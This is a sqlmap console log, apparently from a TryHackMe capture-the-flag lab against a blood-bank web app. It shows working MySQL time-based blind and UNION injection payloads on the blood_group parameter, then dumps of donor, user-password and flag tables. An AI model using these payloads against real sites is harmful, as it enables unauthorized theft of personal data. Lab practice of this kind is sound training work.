        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.2#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:33:14 /2025-06-28/

[10:33:14] [INFO] parsing HTTP request from 'data'
[10:33:14] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Win98; es-ES; rv:1.7.7) Gecko/20050414 Firefox/1.0.3' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[10:33:14] [INFO] resuming back-end DBMS 'mysql' 
[10:33:14] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: blood_group (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: blood_group=B+' AND (SELECT 4245 FROM (SELECT(SLEEP(5)))qYvm) AND 'qJnl'='qJnl

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: blood_group=B+' UNION ALL SELECT NULL,CONCAT(0x7178767871,0x734843556c746669515350626e4a78724a47685161614e6e68744b594565514279704c6f62596a77,0x716b767171),NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[10:33:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.10.3
back-end DBMS: MySQL >= 5.0.12
[10:33:15] [INFO] fetching current user
current user: 'root@localhost'
[10:33:15] [INFO] fetching tables for database: 'blood'
[10:33:15] [INFO] fetching columns for table 'blood_db' in database 'blood'
[10:33:15] [INFO] fetching entries for table 'blood_db' in database 'blood'
Database: blood
Table: blood_db
[1 entry]
+----+-----+--------+--------+-----------+-------------+--------------+--------------------+
| id | Age | Gender | Name   | Address   | blood_group | Phone_number | email_address      |
+----+-----+--------+--------+-----------+-------------+--------------+--------------------+
| 1  | 27  | MALE   | Nare   | Kathmandu | O+          | 9800000000   | nare@sqlmap.com.np |
+----+-----+--------+--------+-----------+-------------+--------------+--------------------+

[10:33:15] [INFO] table 'blood.blood_db' dumped to CSV file '/home/tomba/.local/share/sqlmap/output/10.10.216.58/dump/blood/blood_db.csv'
[10:33:15] [INFO] fetching columns for table 'users' in database 'blood'
[10:33:15] [INFO] fetching entries for table 'users' in database 'blood'
Database: blood
Table: users
[3 entries]
+----+------------+---------+-----------+----------+----------+-----------+-------------+--------------+-------------------+
| id | dob        | gender  | address   | password | username | full_name | blood_group | phone_number | email_address     |
+----+------------+---------+-----------+----------+----------+-----------+-------------+--------------+-------------------+
| 1  | 12/12/1996 | <blank> | Kathmandu | nare     | nare     | nare      | O+          | 9800000000   | nare@nare.sqlmap  |
| 2  | 12/12/2222 | MALE    | google    | nare     | nare     | google    | A+          | 12345555     | google@google.com |
| 3  | 12/12/2021 | MALE    | google    | google   | google   | GOogle    | A+          | 1234567890   | google@gmail.com  |
+----+------------+---------+-----------+----------+----------+-----------+-------------+--------------+-------------------+

[10:33:15] [INFO] table 'blood.users' dumped to CSV file '/home/tomba/.local/share/sqlmap/output/10.10.216.58/dump/blood/users.csv'
[10:33:15] [INFO] fetching columns for table 'flag' in database 'blood'
[10:33:15] [INFO] fetching entries for table 'flag' in database 'blood'
Database: blood
Table: flag
[1 entry]
+----+---------------------+--------+
| id | flag                | name   |
+----+---------------------+--------+
| 1  | thm{sqlm@p_is_L0ve} | flag   |
+----+---------------------+--------+

[10:33:15] [INFO] table 'blood.flag' dumped to CSV file '/home/tomba/.local/share/sqlmap/output/10.10.216.58/dump/blood/flag.csv'
[10:33:15] [INFO] fetched data logged to text files under '/home/tomba/.local/share/sqlmap/output/10.10.216.58'

[*] ending @ 10:33:15 /2025-06-28/

